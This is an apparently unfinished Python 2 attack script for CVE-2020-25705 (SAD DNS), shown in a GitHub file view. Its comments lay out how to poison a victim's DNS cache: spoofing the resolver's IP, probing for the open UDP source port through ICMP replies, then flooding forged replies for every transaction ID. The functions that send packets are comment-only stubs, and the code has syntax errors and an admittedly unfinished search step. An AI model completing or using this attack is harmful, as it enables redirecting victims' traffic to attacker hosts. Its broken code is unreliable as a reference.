/
cve-2020-25705.py
107 lines (92 loc) · 3.4 KB
/
cve-2020-25705.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
#!/usr/bin/python2
#
# Algorithm
#
#
# Prep-Work
#
# * Make list of all possible ports `not really 65,535`
# * Find 50 Known-Closed UDP Ports on the Victim
# * Victim = Ubuntu Server
# * DNS Resolver = Our internal DNS Resolver
#
# 1. Enter loop - Ask for 50 Port Numbers from the List
# 2. Use Scapy to send UDP Packets to all 50 ports to the Victim Spoofing the DNS Resolver IP
# 3. Use Scapy to send UDP Packet to one of the Known-Closed UDP Ports with my Real Source IP
# 4. Keep looping asking for 50 more until I get an ICMP message back
# 5. Exit that loop - Enter new loop - Swap out 25 of the 50 Port Numbers with the Known-Closed UDP Ports
# 6. Use Scapy to send UDP Packets to all 50 ports to the Victim Spoofing the DNS Resolver IP
# 7. Use Scapy to send UDP Packet to one of the Known-Closed UDP Ports with my Real Source IP
# 8. If I get an ICMP message back then I know the Open Port is in the 25 Port's I didn't change
# 9. Swap out 12 of those 25 with 12 more with the Known-Closed UDP Ports
# 10. If I get and ICMP message back, then I know the Open Port is in the 13 ports left
# 11. ..... Keep looping until I find the exact port .....
# 12. Send 65,535 DNS Reply packets for `www.example.com` with a Rouge IP Address instead of the real one to the Victim IP, Open UDP Port, and Try all 65,535 DNS Magic Numbers.
#
import random
import scapy
HIGH_EPHEM_PORT_RANGE_NUMBER = 60999
LOW_EPHEM_PORT_RANGE_NUMBER = 32768
EPHEM_PORTS = list(range(LOW_EPHEM_PORT_RANGE_NUMBER, HIGH_EPHEM_PORT_RANGE_NUMBER)
CLOSED_PORTS = []
VICTIM_IP = ""
RESOLVER_IP = ""
TARGET_NAME = ""
POSION_IP = ""
def doCheck(closed_port=1, ephem_ports):
# send 50 UDP packets spoofing the RESOLVER_IP to the VICTIM_IP
# send UDP packet to the VICTIM_IP to closed_port and wait for reply
# if ICMP received:
# return True
# else:
# return False
def doPosion(ephem_port):
#
# Use scapy to send 65,535 DNS Replies for all possible DNS Magic Numbers
# Spoof the RESOLVER_IP
# Send the POSION_IP instead of the real IP for www.example.com
#
def main():
result = False
closed_port = 1
old_index = 0
new_index = 50
ephem_ports = []
while not result:
ports = EPHEM_PORTS[old_index:new_index]
result = doCheck(closed_port=1, ports=ephem_ports)
if not result:
old_index = new_index
new_index = old_index + 50
#
# Do binary search over the ephem_ports list
#
# Im too tired to think this bit through right now :p
#
result = False
old_index = 0
new_index = 25
while not result:
final_ephem_ports = ephem_ports[old_index:new_index]
final_ephem_ports.extend(CLOSED_PORTS[0:25])
result = doCheck(closed_port=1, ports=final_ephem_ports)
if not result:
if new_index == 25:
old_index = 25
new_index = 50
else if new_index == 50:
# We did not find the Open Port again in this list
# It may be closed already or may not have been false positive
else:
#
# Now we need to split the 25 in half and fill in the rest
# with CLOSED_PORTS
#
#
# Port Found
#
success = doPosion(ephem_port)
if success:
print "Pwn All The Things!"
else:
print "I should loop this program to just keep going instead of quitting here"